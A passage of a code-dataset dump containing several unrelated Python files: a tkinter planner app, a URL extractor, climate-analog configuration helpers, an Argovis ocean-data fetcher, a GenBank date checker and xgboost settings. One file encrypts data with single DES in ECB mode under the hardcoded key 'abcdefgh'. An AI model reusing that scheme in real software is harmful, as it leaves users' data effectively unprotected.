Japan_local_time_formatted)\n\nbutton = Button(tab1, text=\"OK\", command=ok)\nbutton.pack(side=LEFT, padx=5)\n\nLabel(tab1, text=\"Current Local Time:\").pack(side=LEFT,padx=5)\nblank2=Entry(tab1)\nblank2.pack(side=LEFT, padx=5)\n\n\nLabel(tab1, text=\"Current Time in Japan\").pack(side=LEFT, padx=5)\nblank1=Entry(tab1)\nblank1.pack(side=LEFT, padx=5)\n\n\n\n\n\n\n\n\n\n#Currency Conversion - located on tab 2\n\ndef show_answer():\n Ans = float(num1.get()) * 103.23\n blank.insert(0, Ans)\n\n\n\n\n\nButton(tab2, text='Show', command=show_answer).pack(side=BOTTOM, padx=5)\n\n\nblank = Entry(tab2)\nblank.pack(side=BOTTOM, padx=5)\n\nLabel(tab2, text = \"Amount in Yen:\").pack(side=BOTTOM, padx=5)\n\nnum1 = Entry(tab2)\nnum1.pack(side=BOTTOM, padx=5)\n\nLabel(tab2, text = \"Enter USD:\").pack(side=BOTTOM, padx=5)\n\n\n#Pie Chart\n\nLabel(tab2, text = \"What is your food budget?:\").pack(side=TOP, padx=5)\nfood_budget = Entry(tab2)\nfood_budget.pack(side=TOP, pady=5)\n\nLabel(tab2, text = \"What is your travel budget?:\").pack(side=TOP, padx=5)\ntravel_budget = Entry(tab2)\ntravel_budget.pack(side=TOP, pady=5)\n\nLabel(tab2, text = \"What is your entertainment budget?:\").pack(side=TOP, padx=5)\nentertainment_budget = Entry(tab2)\nentertainment_budget.pack(side=TOP, pady=5)\n\nLabel(tab2, text = \"What is your shopping 
budget?:\").pack(side=TOP, padx=5)\nshopping_budget = Entry(tab2)\nshopping_budget.pack(side=TOP, pady=5)\n\ndef piechart():\n global food_budget\n global travel_budget\n global entertainment_budget\n global shopping_budget\n\n global pie2\n\n food_budget1=float(food_budget.get())\n travel_budget1=float(travel_budget.get())\n entertainment_budget1=float(entertainment_budget.get())\n shopping_budget1=float(shopping_budget.get())\n\n figure2 = Figure(figsize=(4,3), dpi=100) \n subplot2 = figure2.add_subplot(111) \n labels2 = 'Food', 'Travel', 'Entertainment', 'Shopping'\n pieSizes = [float(food_budget1),float(travel_budget1),float(entertainment_budget1),float(shopping_budget1)]\n my_colors2 = ['lightblue','lightsteelblue','silver','red']\n explode2 = (0, 0.1, 0,0) \n subplot2.pie(pieSizes, colors=my_colors2, explode=explode2, labels=labels2, autopct='%1.1f%%', shadow=True, startangle=90) \n subplot2.axis('equal') \n pie2 = FigureCanvasTkAgg(figure2, tab2)\n pie2.get_tk_widget().pack()\n\n\n\nButton(tab2, text='Calculate', command=piechart).pack(side=TOP, pady=5)\n\n#addressbook\n\n#this section allows people to input the address and name of the place and then puts that information into a dictionary\n\naddressbook={}\ndef addressbookuserinput():\n useradded={str(nameofplace.get()):str(addressofplace.get())}\n addressbook.update(useradded)\n with open ('addressbook.json','w') as f:\n f.write(json.dumps(addressbook))\n \n \n \n\nLabel(tab3, text = \"Enter Name of Place of Interest:\").grid(row=0, column=0)\nLabel(tab3, text = \"Enter Address of Place:\").grid(row=0, column=2)\n\n\nnameofplace = Entry(tab3)\nnameofplace.grid(row=0, column=1)\n\naddressofplace = Entry(tab3)\naddressofplace.grid(row=0, column=3)\n\nButton(tab3, text='Add to address book', command=addressbookuserinput).grid(row=0, column=4, sticky=W,)\n\n\n#This is where the user can put an address into the entry and the program will spit out a address\nuserneededaddress=Entry(tab3)\nuserneededaddress.grid(row=1, column=1)\n\naddressofuserinput=Entry(tab3)\naddressofuserinput.grid(row=2, column=2)\n\nLabel(tab3, text=\"The address of the requested place is: \").grid(row=2, column=1)\nLabel(tab3, text=\"Enter Name of Place you would like an address for: \").grid(row=1, column=0)\n\ndef search_entry(): \n s=open('addressbook.json','r').read()\n if userneededaddress.get() in s:\n y=str(addressbook[userneededaddress.get()])\n addressofuserinput.insert(0, y)\n \n else:\n addressofuserinput.insert(0, \"Not in Book\")\n \n \n #this creates a new label to the GUI\n \n\nButton(tab3, text='search_entry', command=search_entry).grid(row=1, column=2)\n\n\n\n\nroot.mainloop()\n\n\n","sub_path":"plannerapp.py","file_name":"plannerapp.py","file_ext":"py","file_size_in_byte":6509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"537742902","text":"# -*- coding: utf-8 -*-\r\n\r\nimport re\r\nimport io\r\n\r\n\r\ndef get_html(file_name):\r\n with io.open(file_name, 'r', encoding='utf-8') as fp:\r\n return fp.read()\r\n\r\n\r\ndef get_url(html):\r\n pattern = r'http[s]?://[\\w.-/]+'\r\n return re.findall(pattern, html)\r\n\r\n\r\nif __name__ == '__main__':\r\n html = get_html('web.html')\r\n with io.open('results.txt', 'w', encoding='utf-8') as fp:\r\n for url in get_url(html):\r\n fp.write(url + 
'\\n')\r\n","sub_path":"python/0009/get_url.py","file_name":"get_url.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"646337235","text":"from Crypto.Cipher import DES\nimport binascii\n\nclass Crypt():\n    def __init__(self):\n        self.key = b'abcdefgh'\n    def encypt(self, s):\n\n        # Create the DES cipher object (ECB mode, 8-byte key)\n        des = DES.new(self.key, DES.MODE_ECB)\n        # Pad the data to encrypt up to a multiple of the 8-byte block size\n        text = s\n        text = text + (8 - (len(text) % 8)) * '='\n        # Run the encryption and hex-encode the result\n        encrypto_text = des.encrypt(text.encode())\n        encrypto_text = binascii.b2a_hex(encrypto_text)\n        return encrypto_text\n\n    def descypt(self, s):\n        # Decrypt: mirror encypt -- hex-decode, DES-ECB decrypt, then drop the '=' padding\n        des = DES.new(self.key, DES.MODE_ECB)\n        bytedt = binascii.a2b_hex(s)\n        y = des.decrypt(bytedt)\n        return y.decode('UTF-8').rstrip('=')\n\nif __name__ == '__main__':\n\n    obj = Crypt()\n    a = obj.encypt(\"test\")\n    print(a)\n\n\n\n","sub_path":"Common/Function/DES_en.py","file_name":"DES_en.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"80322279","text":"import os\n\nfrom flyingpigeon import config\nfrom flyingpigeon import templating\nfrom flyingpigeon.utils import prepare_static_folder\n\nimport logging\nLOGGER = logging.getLogger(\"PYWPS\")\n\n\ndef get_configfile(files,\n                   seasoncyc_base=None,\n                   seasoncyc_sim=None,\n                   base_id='NCEP',\n                   sim_id='NCEP',\n                   timewin=1,\n                   varname='slp',\n                   seacyc=False,\n                   cycsmooth=91,\n                   nanalog=20,\n                   seasonwin=30,\n                   distfun='rms',\n                   outformat='.txt',\n                   period=[\"1973-01-01\", \"2012-12-31\"],\n                   bbox=\"-180.0,-90.0,180,90.0\",\n                   calccor=True,\n                   silent=False):\n    \"\"\"\n    Generates the configuration file for the CASTf90 calculation.\n\n    TODO: use jinja template\n\n    :param files: input files (reference period and period for analyses)\n    :param timewin: number of days the distance is averaged\n    :param varname: variable name in input files\n    :param seacyc: remove the smoothed seasonal cycle from the input fields (True/False)\n    :param cycsmooth: smoothing window for the seasonal cycle in days (should be an odd integer)\n    :param nanalog: Number of analogs to detect\n    :param distfun: Name of the distance function used to calculate the analogs.\n        (Supported values: 'rms' 'mahalanobis', 'S1' (Teweles and wobus), 'cosine' (correlation)\n        and - still experimental - 'of' (displacement and amplitude score based on optical flow image distortion)\n    :param outformat: file format for output ('txt' or 'nc' (default))\n    :param analysis_period: dates for which analogs are desired\n    :param period: reference period in which analogs are picked (for netcdf output attributes)\n    :param bbox: coordinates for the region to be analysed\n    :param calccor: calculate rank correlation for analog fields (True/False)\n    :param silent: handling of log file output\n\n    :returns: configuration file\n    \"\"\"\n    from datetime import datetime as dt\n\n    date_stamp = dt.strftime(dt.now(), format='%Y%m%d_%H%M%S')\n    LOGGER.info('start configuration file preparation at: %s' % (date_stamp))\n\n    # convert True/False to Fortran syntax\n    seacyc = str(seacyc)\n    calccor = str(calccor)\n    silent = str(silent)\n\n    # write stuff to configuration file\n    # NB: if order or format or number changes, need to edit wps_analogs_viewer.py\n    # and template_analogviewer.html where these scripts read in the config\n    # params\n    config_file = \"config.txt\"\n\n    config = open(config_file, \"w\")\n\n    config.write(\n        '!Configuration file for CASTf90 analogs processes 
deployed in flyingpigeon\\n')\n config.write('!Created : %s \\n' % (date_stamp))\n config.write('!Version : 0.1.5 \\n')\n config.write('&FILES \\n')\n config.write(' my_files%archivefile = \"{file}\" \\n'.format(\n file=os.path.relpath(files[0])))\n config.write(' my_files%simulationfile = \"{file}\" \\n'.format(\n file=os.path.relpath(files[1])))\n config.write(' my_files%outputfile = \"{file}\" \\n'.format(\n file=os.path.relpath(files[2])))\n\n if seacyc is not 'False':\n config.write(' my_files%seacycfilebase = \"{file}\" \\n'.format(\n file=os.path.relpath(seasoncyc_base)))\n config.write(' my_files%seacycfilesim = \"{file}\" \\n'.format(\n file=os.path.relpath(seasoncyc_sim)))\n\n config.write('/ \\n')\n config.write('&PARAM \\n')\n config.write(' my_params%timewin = {timewin} \\n'.format(timewin=timewin))\n config.write(' my_params%varname = \"{varname}\" \\n'.format(varname=varname))\n config.write(' my_params%seacyc = .{seacyc}. \\n'.format(\n seacyc=seacyc.upper()))\n config.write(' my_params%cycsmooth = {cycsmooth} \\n'.format(\n cycsmooth=cycsmooth))\n config.write(' my_params%nanalog = {nanalog} \\n'.format(nanalog=nanalog))\n config.write(' my_params%seasonwin = {seasonwin} \\n'.format(\n seasonwin=seasonwin))\n config.write(' my_params%distfun = \"{distfun}\" \\n'.format(distfun=distfun))\n config.write(' my_params%calccor = .{calccor}. \\n'.format(\n calccor=calccor.upper()))\n config.write(' my_params%oformat = \"{outformat}\" \\n'.format(\n outformat=outformat)) # \".txt\" # ! if equals \".nc\"\n config.write(' my_params%silent = .{silent}.\\n'.format(\n silent=silent.upper()))\n config.write('/\\n')\n config.write('&ATTS\\n')\n config.write(' my_atts%simsource = \"{sim_id}\" \\n'.format(sim_id=sim_id)) # model name\n config.write(\n ' my_atts%predictorvar = \"{varname}\" \\n'.format(varname=varname))\n config.write(' my_atts%archisource = \"{base_id}\" \\n'.format(base_id=base_id))\n config.write(' my_atts%archiperiod = \"{start},{end}\" \\n'.format(\n start=period[0], end=period[1]))\n config.write(' my_atts%predictordom = \"{bbox}\" \\n'.format(bbox=bbox))\n config.write('/\\n')\n\n config.close()\n return config_file\n\n# def subset(resource=[], bbox='-80,50,22.5,70'):\n# \"\"\"\n# OBSOLETE\n# Returns a subset.\n\n# :param resource: netCDF input files of one dataset\n# :param bbox: bounding box\n\n# :return: subset netCDF file\n# \"\"\"\n# from tempfile import mkstemp\n# from cdo import Cdo\n# cdo = Cdo()\n# resource.sort()\n\n# ip, nc_concat = mkstemp(dir='.',suffix='.nc')\n# nc_concat = cdo.cat(input=resource, output=nc_concat)\n\n# ip, nc_subset = mkstemp(dir='.',suffix='.nc')\n# nc_subset = cdo.sellonlatbox('%s' % bbox, input=nc_concat, output=nc_subset)\n# LOGGER.info('subset done: %s ' % nc_subset)\n\n# return nc_subset\n\n\ndef seacyc(archive, simulation, method='base'):\n \"\"\"\n Subtracts the seasonal cycle.\n\n :param archive: netCDF file containing the reference period\n :param simulation: netCDF file containing the period to be analysed\n :param method: method to generate the seasonal cycle files\n base = seasonal cycle generated from reference period\n sim = seasonal cycle generated from period to be analysed\n own = seasonal cycle generated for both time windows\n\n :return [str,str]: two netCDF filenames for analysis and reference period (located in working directory)\n \"\"\"\n try:\n LOGGER.debug('seacyc started with method: %s' % method)\n\n from shutil import copy\n from flyingpigeon.ocgis_module import call\n from flyingpigeon.utils import 
get_variable\n        from cdo import Cdo\n        cdo = Cdo()\n\n        if method == 'base':\n            seasoncyc_base = cdo.ydaymean(\n                input=archive, output='seasoncyc_base.nc')\n            variable = get_variable(archive)\n            # seasoncyc_base = call(resource=archive,\n            #                       variable=variable,\n            #                       prefix='seasoncyc_base',\n            #                       calc=[{'func': 'mean', 'name': variable}],\n            #                       calc_grouping=['day','month'] )\n\n            LOGGER.debug('seasoncyc_base calculated : %s' % seasoncyc_base)\n            seasoncyc_sim = 'seasoncyc_sim.nc'\n            copy(seasoncyc_base, seasoncyc_sim)\n        elif method == 'sim':\n            # seasoncyc_sim = call(resource=archive,\n            #                       variable=variable,\n            #                       prefix='seasoncyc_sim',\n            #                       calc=[{'func': 'mean', 'name': variable}],\n            #                       calc_grouping=['day','month'] )\n            seasoncyc_sim = cdo.ydaymean(\n                input=simulation, output='seasoncyc_sim.nc')\n            seasoncyc_base = 'seasoncyc_base.nc'\n            copy(seasoncyc_sim, seasoncyc_base)\n        elif method == 'own':\n            # seasoncyc_base = call(resource=archive,\n            #                       variable=variable,\n            #                       prefix='seasoncyc_base',\n            #                       calc=[{'func': 'mean', 'name': variable}],\n            #                       calc_grouping=['day','month'] )\n            seasoncyc_base = cdo.ydaymean(\n                input=archive, output='seasoncyc_base.nc')\n            # seasoncyc_sim = call(resource=archive,\n            #                       variable=variable,\n            #                       prefix='seasoncyc_sim',\n            #                       calc=[{'func': 'mean', 'name': variable}],\n            #                       calc_grouping=['day','month'] )\n            seasoncyc_sim = cdo.ydaymean(\n                input=simulation, output='seasoncyc_sim.nc')\n        else:\n            raise Exception('normalisation method not found')\n\n    except Exception:\n        msg = 'seacyc function failed:'\n        LOGGER.exception(msg)\n        raise Exception(msg)\n\n    return seasoncyc_base, seasoncyc_sim\n\n\ndef config_edits(configfile):\n    \"\"\"\n    Edits the CASTf90 configuration file. Removes filepaths.\n\n    :param configfile: configfile name with its path\n\n    :return str: modified_configfile name\n    \"\"\"\n    try:\n\n        # Read in the file\n        filedata = None\n        with open(configfile, 'r') as file:\n            filedata = file.read()\n\n        # Replace the target string\n        filedata = filedata.replace(\n            '/home/scratch01/sradanov/A2C2/NCEP/', '').replace('/home/estimr2/sradanov/Operational/', '')\n\n        # Write the file out again\n        with open(configfile, 'w') as file:\n            file.write(filedata)\n\n        LOGGER.info('configfile modified')\n    except Exception:\n        LOGGER.exception('Failed to modify configfile:')\n\n    return configfile\n\n\ndef reformat_analogs(analogs):\n    \"\"\"\n    Reformats analogs results file for analogues viewer code.\n\n    :param analogs: output from analog_detection process\n\n    :return str: reformatted analogs file for analogues viewer\n    \"\"\"\n    import numpy as np\n    import pandas as pd\n\n    try:\n        num_cols = 3  # dateAnlg, Dis, Corr\n\n        # Create dataframe and read in output csv file of analogs process\n        dfS = pd.DataFrame()\n        dfS = pd.read_csv(analogs, delimiter=r\"\\s+\", index_col=0)\n\n        # Find number of analogues (integer division: iloc slicing needs an int in Python 3)\n        num_analogues = dfS.shape[1] // 3\n        # LOGGER.debug('num_analogues: %s', num_analogues)\n\n        # Define temporary df\n        df_anlg = dfS.iloc[:, 0:num_analogues]  # store only anlg dates\n        df_dis = dfS.iloc[:, num_analogues:2 * num_analogues]  # store only dis\n        df_corr = dfS.iloc[:, 2 * num_analogues:3 *\n                           num_analogues]  # store only corr\n\n        # remove index name before stacking\n        df_anlg.index.name = \"\"\n        df_dis.index.name = \"\"\n        df_corr.index.name = \"\"\n\n        dateStack = df_anlg.stack()\n        disStack = df_dis.stack().abs()  # raw values < 0 so take abs\n        corrStack = df_corr.stack()\n\n        # Create df of correct dimensions (n x num_cols) using dfS\n        df_all = dfS.iloc[:, 0:num_cols]  # NB data are 
placeholders\n # Rename cols\n df_all.columns = ['dateAnlg', 'Dis', 'Corr']\n # Replicate each row 20 times (for dcjs format)\n df_all = df_all.loc[np.repeat(df_all.index.values, num_analogues)]\n # Replace data placeholders with correct values\n df_all['dateAnlg'] = list(dateStack)\n df_all['Dis'] = list(disStack)\n df_all['Corr'] = list(corrStack)\n # Name index col\n df_all.index.name = 'dateRef'\n\n # save to tsv file\n analogs_mod = 'modified-analogfile.tsv'\n df_all.to_csv(analogs_mod, sep='\\t')\n LOGGER.info('successfully reformatted analog file')\n except Exception:\n msg = 'failed to reformat analog file'\n LOGGER.exception(msg)\n raise Exception(msg)\n return analogs_mod\n\n\ndef render_viewer(configfile, datafile):\n \"\"\"\n Generate an analogs viewer HTML page based on a template.\n\n :param datafile: modified analogs file (output of reformat_analogs)\n :param configfile: configuration file\n\n return html: analog viewer html page\n \"\"\"\n try:\n page = 'analogviewer.html'\n with open(page, 'w') as fp:\n fp.write(templating.render_template(\n page,\n configfile=configfile,\n datafile=datafile,\n # static_url=config.output_url() + '/static'))\n static_url='../static'))\n prepare_static_folder()\n except Exception:\n msg = \"Failed to render analogviewer.\"\n LOGGER.exception(msg)\n raise Exception(msg)\n else:\n return page\n","sub_path":"flyingpigeon/analogs.py","file_name":"analogs.py","file_ext":"py","file_size_in_byte":12239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"129188159","text":"#!/bin/env python\n# -*coding: UTF-8 -*-\n#\n# Argo data fetcher for Argovis.\n# Code borrows heavily from API gathered at:\n# https://github.com/earthcube2020/ec20_tucker_etal/blob/master/EC2020_argovis_python_api.ipynb\n#\n# This is comprised of functions used to query Argovis api\n# query functions either return dictionary objects or error messages.\n#\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport json\nimport getpass\nfrom .proto import ArgoDataFetcherProto\nfrom abc import abstractmethod\nimport warnings\n\nfrom argopy.stores import httpstore\nfrom argopy.options import OPTIONS\nfrom argopy.utilities import list_standard_variables\nfrom argopy.errors import DataNotFound\nfrom argopy.plotters import open_dashboard\n\naccess_points = ['wmo', 'box']\nexit_formats = ['xarray']\ndataset_ids = ['phy'] # First is default\napi_server = 'https://argovis.colorado.edu' # API root url\napi_server_check = api_server + '/catalog' # URL to check if the API is alive\n\nclass ArgovisDataFetcher(ArgoDataFetcherProto):\n ###\n # Methods to be customised for a specific Argovis request\n ###\n @abstractmethod\n def init(self):\n \"\"\" Initialisation for a specific fetcher \"\"\"\n pass\n\n @abstractmethod\n def cname(self):\n \"\"\" Return a unique string defining the request\n\n Provide this string to populate meta data and titles\n \"\"\"\n pass\n\n @property\n def url(self):\n \"\"\" Return the URL used to download data \"\"\"\n pass\n\n ###\n # Methods that must not change\n ###\n def __init__(self,\n ds: str = \"\",\n cache: bool = False,\n cachedir: str = \"\",\n **kwargs):\n \"\"\" Instantiate an Argovis Argo data loader\n\n Parameters\n ----------\n ds: 'phy'\n cache : False\n cachedir : None\n \"\"\"\n self.fs = httpstore(cache=cache, cachedir=cachedir, timeout=120)\n self.definition = 'Argovis Argo data fetcher'\n self.dataset_id = OPTIONS['dataset'] if ds == '' else ds\n self.server = api_server\n 
self.init(**kwargs)\n self.key_map = {\n 'date': 'TIME',\n 'date_qc': 'TIME_QC',\n 'lat': 'LATITUDE',\n 'lon': 'LONGITUDE',\n 'cycle_number': 'CYCLE_NUMBER',\n 'DATA_MODE': 'DATA_MODE',\n 'DIRECTION': 'DIRECTION',\n 'platform_number': 'PLATFORM_NUMBER',\n 'position_qc': 'POSITION_QC',\n 'pres': 'PRES',\n 'temp': 'TEMP',\n 'psal': 'PSAL',\n 'index': 'N_POINTS'\n }\n\n def __repr__(self):\n summary = [\"\" % self.definition]\n summary.append(\"Domain: %s\" % self.cname())\n return '\\n'.join(summary)\n\n def _add_history(self, this, txt):\n if 'history' in this.attrs:\n this.attrs['history'] += \"; %s\" % txt\n else:\n this.attrs['history'] = txt\n return this\n\n def json2dataframe(self, profiles):\n \"\"\" convert json data to Pandas DataFrame \"\"\"\n # Make sure we deal with a list\n if isinstance(profiles, list):\n data = profiles\n else:\n data = [profiles]\n # Transform\n rows = []\n for profile in data:\n keys = [x for x in profile.keys() if x not in ['measurements', 'bgcMeas']]\n meta_row = dict((key, profile[key]) for key in keys)\n for row in profile['measurements']:\n row.update(meta_row)\n rows.append(row)\n df = pd.DataFrame(rows)\n return df\n\n def to_dataframe(self):\n \"\"\" \"\"\"\n results = []\n urls = self.url\n if isinstance(urls, str):\n urls = [urls] # Make sure we deal with a list\n for url in urls:\n js = self.fs.open_json(url)\n if isinstance(js, str):\n continue\n df = self.json2dataframe(js)\n df = df.reset_index()\n df = df.rename(columns=self.key_map)\n df = df[[value for value in self.key_map.values() if value in df.columns]]\n results.append(df)\n\n results = [r for r in results if r is not None] # Only keep non-empty results\n if len(results) > 0:\n df = pd.concat(results, ignore_index=True)\n df.sort_values(by=['TIME', 'PRES'], inplace=True)\n df = df.set_index(['N_POINTS'])\n # df['N_POINTS'] = np.arange(0, len(df['N_POINTS'])) # Re-index to avoid duplicate values\n return df\n else:\n raise DataNotFound(\"CAN'T FETCH ANY DATA !\")\n\n def to_xarray(self):\n \"\"\" Download and return data as xarray Datasets \"\"\"\n ds = self.to_dataframe().to_xarray()\n ds = ds.sortby(['TIME', 'PRES']) # should already be sorted by date in decending order\n ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS'])) # Re-index to avoid duplicate values\n\n # Set coordinates:\n # ds = ds.set_coords('N_POINTS')\n coords = ('LATITUDE', 'LONGITUDE', 'TIME', 'N_POINTS')\n ds = ds.reset_coords()\n ds['N_POINTS'] = ds['N_POINTS']\n # Convert all coordinate variable names to upper case\n for v in ds.data_vars:\n ds = ds.rename({v: v.upper()})\n ds = ds.set_coords(coords)\n\n # Cast data types and add variable attributes (not available in the csv download):\n ds = ds.argo.cast_types()\n\n # Remove argovis file attributes and replace them with argopy ones:\n ds.attrs = {}\n if self.dataset_id == 'phy':\n ds.attrs['DATA_ID'] = 'ARGO'\n elif self.dataset_id == 'ref':\n ds.attrs['DATA_ID'] = 'ARGO_Reference'\n elif self.dataset_id == 'bgc':\n ds.attrs['DATA_ID'] = 'ARGO-BGC'\n ds.attrs['DOI'] = 'http://doi.org/10.17882/42182'\n ds.attrs['Fetched_from'] = self.server\n ds.attrs['Fetched_by'] = getpass.getuser()\n ds.attrs['Fetched_date'] = pd.to_datetime('now').strftime('%Y/%m/%d')\n ds.attrs['Fetched_constraints'] = self.cname()\n ds.attrs['Fetched_uri'] = self.url\n ds = ds[np.sort(ds.data_vars)]\n return ds\n\n def filter_data_mode(self, ds, **kwargs):\n # Argovis data already curated !\n # ds = ds.argo.filter_data_mode(errors='ignore', **kwargs)\n if ds.argo._type == 'point':\n 
ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS']))\n return ds\n\n def filter_qc(self, ds, **kwargs):\n # Argovis data already curated !\n # ds = ds.argo.filter_qc(**kwargs)\n if ds.argo._type == 'point':\n ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS']))\n return ds\n\n def filter_variables(self, ds, mode='standard'):\n if mode == 'standard':\n to_remove = sorted(list(set(list(ds.data_vars)) - set(list_standard_variables())))\n return ds.drop_vars(to_remove)\n else:\n return ds\n\n\nclass Fetch_wmo(ArgovisDataFetcher):\n def init(self, WMO=[], CYC=None):\n \"\"\" Create Argo data loader for WMOs and CYCs\n\n Parameters\n ----------\n WMO : list(int)\n The list of WMOs to load all Argo data for.\n CYC : int, np.array(int), list(int)\n The cycle numbers to load.\n \"\"\"\n if isinstance(WMO, int):\n WMO = [WMO] # Make sure we deal with a list\n if isinstance(CYC, int):\n CYC = np.array((CYC,), dtype='int') # Make sure we deal with an array of integers\n if isinstance(CYC, list):\n CYC = np.array(CYC, dtype='int') # Make sure we deal with an array of integers\n self.WMO = WMO\n self.CYC = CYC\n\n self.definition = \"?\"\n if self.dataset_id == 'phy':\n self.definition = 'Argovis Argo data fetcher for floats'\n return self\n\n def cname(self):\n \"\"\" Return a unique string defining the constraints \"\"\"\n if len(self.WMO) > 1:\n listname = [\"WMO%i\" % i for i in self.WMO]\n if isinstance(self.CYC, (np.ndarray)):\n [listname.append(\"CYC%0.4d\" % i) for i in self.CYC]\n listname = \";\".join(listname)\n else:\n listname = \"WMO%i\" % self.WMO[0]\n if isinstance(self.CYC, (np.ndarray)):\n listname = [listname]\n [listname.append(\"CYC%0.4d\" % i) for i in self.CYC]\n listname = \"_\".join(listname)\n listname = self.dataset_id + \"_\" + listname\n return listname\n\n @property\n def url(self):\n \"\"\" Return the URL used to download data \"\"\"\n urls = []\n if isinstance(self.CYC, (np.ndarray)) and self.CYC.nbytes > 0:\n profIds = [str(wmo) + '_' + str(cyc) for wmo in self.WMO for cyc in self.CYC.tolist()]\n urls.append((self.server + '/catalog/mprofiles/?ids={}').format(profIds).replace(' ', ''))\n # elif self.dataset_id == 'bgc' and isinstance(self.CYC, (np.ndarray)) and self.CYC.nbytes > 0:\n # profIds = [str(wmo) + '_' + str(cyc) for wmo in self.WMO for cyc in self.CYC.tolist()]\n # urls.append((self.server + '/catalog/profiles/{}').format(self.CYC))\n else:\n for wmo in self.WMO:\n urls.append((self.server + '/catalog/platforms/{}').format(str(wmo)))\n if len(urls) == 1:\n return urls[0]\n else:\n return urls\n\n def dashboard(self, **kw):\n if len(self.WMO) == 1:\n return open_dashboard(wmo=self.WMO[0], **kw)\n else:\n warnings.warn(\"Plot dashboard only available for one float frequest\")\n\n\nclass Fetch_box(ArgovisDataFetcher):\n\n def init(self, box: list):\n \"\"\" Create Argo data loader\n\n Parameters\n ----------\n box : list(float, float, float, float, float, float, str, str)\n The box domain to load all Argo data for:\n box = [lon_min, lon_max, lat_min, lat_max, pres_min, pres_max, datim_min, datim_max]\n \"\"\"\n if len(box) == 6:\n # Select the last months of data:\n end = pd.to_datetime('now')\n start = end - pd.DateOffset(months=1)\n box.append(start.strftime('%Y-%m-%d'))\n box.append(end.strftime('%Y-%m-%d'))\n elif len(box) != 8:\n raise ValueError('Box must 6 or 8 length')\n self.BOX = box\n\n self.definition = '?'\n if self.dataset_id == 'phy':\n self.definition = 'Argovis Argo data fetcher for a space/time region'\n return self\n\n def cname(self):\n \"\"\" 
Return a unique string defining the constraints \"\"\"\n BOX = self.BOX\n boxname = (\"[x=%0.2f/%0.2f; y=%0.2f/%0.2f; z=%0.1f/%0.1f; t=%s/%s]\") % \\\n (BOX[0], BOX[1], BOX[2], BOX[3], BOX[4], BOX[5],\n self._format(BOX[6], 'tim'), self._format(BOX[7], 'tim'))\n boxname = self.dataset_id + \"_\" + boxname\n return boxname\n\n @property\n def url(self):\n \"\"\" Return the URL used to download data \"\"\"\n shape = [[[self.BOX[0], self.BOX[2]], [self.BOX[0], self.BOX[3]], [self.BOX[1], self.BOX[3]],\n [self.BOX[1], self.BOX[2]], [self.BOX[0], self.BOX[2]]]]\n strShape = str(shape).replace(' ', '')\n url = self.server + '/selection/profiles'\n url += '?startDate={}'.format(self.BOX[6])\n url += '&endDate={}'.format(self.BOX[7])\n url += '&shape={}'.format(strShape)\n url += '&presRange=[{},{}]'.format(self.BOX[4], self.BOX[5])\n return url\n","sub_path":"argopy/data_fetchers/argovis_data.py","file_name":"argovis_data.py","file_ext":"py","file_size_in_byte":11634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"191720903","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nfind_invalid_dates.py\n\n@author: Bill Thompson\n@license: GPL 3\n@copyright: Sept. 14, 2020\n\"\"\"\n\nfrom datetime import datetime\nfrom consensus3 import read_genbank_file\nfrom remove_dups_dates import read_fasta_file\n\ndef check_date(date):\n \"\"\"\n check_date - check for complete date, month, day, year\n\n Parameters\n ----------\n date : str\n a GenBank collection date.\n\n Returns\n -------\n dt : tuple\n (datetime object, boolean) \n second term is TRUE if date is complte\n \"\"\"\n # try and guess the format\n date_ok = True\n try:\n dt = datetime.strptime(date, '%d-%b-%Y')\n except ValueError:\n try:\n dt = datetime.strptime(date, '%b-%Y')\n date_ok = False\n except ValueError:\n try:\n dt = datetime.strptime(date, '%m/%d/%Y')\n except ValueError:\n try:\n dt = datetime.strptime(date, '%Y-%m-%d')\n except:\n try:\n dt = datetime.strptime(date, '%Y-%m')\n date_ok = False\n except:\n dt = datetime.strptime(date, '%Y')\n date_ok = False\n\n return (dt, date_ok)\n\ndef main():\n date = '2020_09_04'\n base = '/mnt/g/Covid-19/' + date + '/' \n \n fasta_file = base + 'sequences.fasta'\n genbank_file = base + 'sequences.gb'\n \n all_seqs = read_fasta_file(fasta_file)\n gb = read_genbank_file(genbank_file)\n \n for id, record in gb.items():\n collection_date = record.features[0].qualifiers['collection_date'][0]\n formatted_date, ok = check_date(collection_date)\n if (not ok) and id in all_seqs :\n print(id, collection_date, formatted_date)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"find_invalid_dates.py","file_name":"find_invalid_dates.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"174253706","text":"LOWER_BOUND = .000001\nINFINITY = 99999\n\n# http://xgboost.readthedocs.io/en/latest/parameter.html\nCONSTRAINT = {\n 'max_depth': [0, INFINITY],\n 'min_child_weight': [0, INFINITY],\n 'eta': [0.0, 1.0],\n 'subsample': [LOWER_BOUND, 1],\n 'colsample_bytree': [LOWER_BOUND, 1],\n 'objective':'reg:linear'\n}\n\nSTEP = {\n 'max_depth': 1,\n 'min_child_weight': 1,\n 'eta': 0.02,\n 'subsample': 0.02,\n 'colsample_bytree': 0.04,\n 
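# the objective entry is not a tunable step size; it simply mirrors the entry in CONSTRAINT\n    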
